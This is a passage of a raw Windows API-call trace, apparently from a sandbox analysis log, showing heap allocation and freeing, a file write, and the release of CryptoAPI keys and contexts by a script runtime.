Size=0x10) returned 0x2e50db8 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0236.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7b0) returned 0x3be0048 [0236.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.785] WriteFile (in: hFile=0x2a0, lpBuffer=0x3be0048*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesWritten=0x8cf5e4*=0x7b0, lpOverlapped=0x0) returned 1 [0236.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0236.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0236.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0236.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0236.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0236.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0236.788] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0236.788] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0236.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0236.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.789] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0236.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e510b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0236.790] CryptDestroyKey (hKey=0xa874d0) returned 1 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0236.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0236.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.790] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.790] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.791] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0236.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0236.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.791] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0236.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.792] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0236.792] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.792] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.792] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0236.792] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.792] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.792] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.793] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0236.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.793] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0236.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0236.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.793] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0236.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0236.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0236.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.794] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0236.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0236.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.794] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0236.794] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0236.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0236.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0236.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0236.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ba8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0236.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.795] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0236.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0236.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0236.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0236.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0236.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0236.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.797] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0236.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0236.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0236.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.797] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0236.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0236.798] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.798] FreeLibrary (hLibModule=0x756e0000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0236.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0236.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0236.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0236.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0236.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.799] CloseHandle (hObject=0x2d0) returned 1 [0236.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.799] HeapFree (in: hHeap=0x970000, 